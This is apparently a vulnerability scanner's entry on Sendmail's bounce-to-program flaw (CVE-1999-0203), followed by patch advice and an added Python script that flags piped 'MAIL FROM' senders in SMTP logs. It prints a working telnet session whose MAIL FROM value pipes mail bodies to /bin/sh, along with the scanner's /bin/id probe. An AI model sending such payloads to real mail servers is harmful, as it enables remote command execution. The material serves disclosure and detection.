| VID |
18017 |
| Severity |
40 |
| Port |
25 |
| Protocol |
TCP |
| Class |
SMTP |
| Detailed Description |
The Sendmail server allows mail to be bounced to a program. Sendmail may accept an improper "MAIL FROM" address that includes a pipe ("|") character. This probably means that it is possible to send mail that will be bounced to a program, which is a serious threat, since it allows a remote attacker to execute arbitrary commands on this host. Using this vulnerability, a remote attacker would send mail for an actual attack as follows:
>>
telnet [target address] 25
HELO domain.com
MAIL FROM: |/bin/sed '1,/^$/d'|bin/sh
RCPT TO: nosuchuser
DATA
hello!! my name is test program....
ping test.com
Quit
>>
The mail would bounce and go back to the sender, which would then pass it through the pipe and execute the body of the message (ping test.com).
Note: This check tests for the vulnerability using "MAIL FROM: |/bin/id>by_scanner.bouncetoprogram.vulnerability". The result might be a false positive, since some MTAs such as Smail and the IRIX 6.x sendmail will not complain about this test, but instead just drop the message silently. The scanner attempts to create a file called 'by_scanner.bouncetoprogram.vulnerability' in the /tmp directory. If this file exists on the specified host after the scan is complete, then the host is vulnerable.
* References: http://www.cert.org/advisories/CA-1995-08.html ftp://ciac.llnl.gov/pub/ciac/bulletin/e-fy94/e-03.ciac-unix-sendmail-vulns |
| Recommendation |
Upgrade to the latest version of Sendmail or apply the appropriate patch for your system, available from the Sendmail site: ftp://ftp.sendmail.org/pub/sendmail/
* Eric Allman: Upgrade to Sendmail 8.6.12 ftp://ftp.cert.org/pub/tools/sendmail/sendmail.8.6.12
* Berkeley Software Design, Inc. (BSDI): Upgrade to BSD/OS V2.0.1, or install patch U200-011 for BSD/OS V2.0 users ftp://ftp.bsdi.com/bsdi/patches/U200-011
* Sun Microsystems, Inc.: Install the patch for Sun OS 4.1.3, 4.1.37_u1, and 4.1.4 users ftp://ftp.uu.net/systems/sun/sun-dist/
* Silicon Graphics Inc.: Upgrade to Sendmail 8.6.12 or install the patch ftp://ftp.sgi.com
Refer to the following reference site for detailed information: http://www.cert.org/advisories/CA-1995-08.html |
| Related URL |
CVE-1999-0203 (CVE) |
| Related URL |
(SecurityFocus) |
| Related URL |
(ISS) |
|
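The Detailed Description above turns on a "MAIL FROM" address that contains a pipe character. The following is an added example, not part of the original entry or of the scanner: it flags such envelope senders in captured SMTP commands, including the scanner's own probe string. The log layout ("client-ip command") and all sample lines are constructed assumptions.

```python
import re

# SMTP "MAIL FROM:" command; group 1 is everything after the colon.
MAIL_FROM = re.compile(r"^MAIL\s+FROM:\s*(.*)$", re.IGNORECASE)

def reverse_path(command):
    """Return the envelope sender from a MAIL FROM command, or None."""
    m = MAIL_FROM.match(command.strip())
    if m is None:
        return None
    arg = m.group(1).strip()
    if arg.startswith("<"):
        # Cut at the LAST '>' so a redirect inside a command ("id>file")
        # does not truncate the path; ESMTP parameters follow that '>'.
        end = arg.rfind(">")
        arg = arg[1:end] if end > 0 else arg[1:]
    return arg.strip()

def classify(path):
    """'program' = sender is a pipe to a command; 'pipe' = '|' elsewhere."""
    bare = path.lstrip("\"' \t")
    if bare.startswith("|"):
        return "program"
    if "|" in path:
        return "pipe"
    return "ok"

def scan(lines):
    """Yield (client, verdict, path) for every suspicious MAIL FROM line."""
    for line in lines:
        client, _, command = line.partition(" ")
        path = reverse_path(command)
        verdict = classify(path) if path is not None else "ok"
        if verdict != "ok":
            yield client, verdict, path

# Constructed sample log: "<client-ip> <SMTP command as received>".
SAMPLE_LOG = [
    "192.0.2.10 HELO domain.com",
    "192.0.2.10 MAIL FROM: |/bin/id>by_scanner.bouncetoprogram.vulnerability",
    "198.51.100.7 MAIL FROM:<alice@example.org> SIZE=2048",
    "203.0.113.5 mail from:<|/bin/id>by_scanner.bouncetoprogram.vulnerability>",
    "203.0.113.9 MAIL FROM:<a|b@example.org>",
]

if __name__ == "__main__":
    for client, verdict, path in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{path}")
```

A "program" verdict corresponds to the bounce-to-program pattern this check tests for; a "pipe" verdict only marks an address worth a manual look.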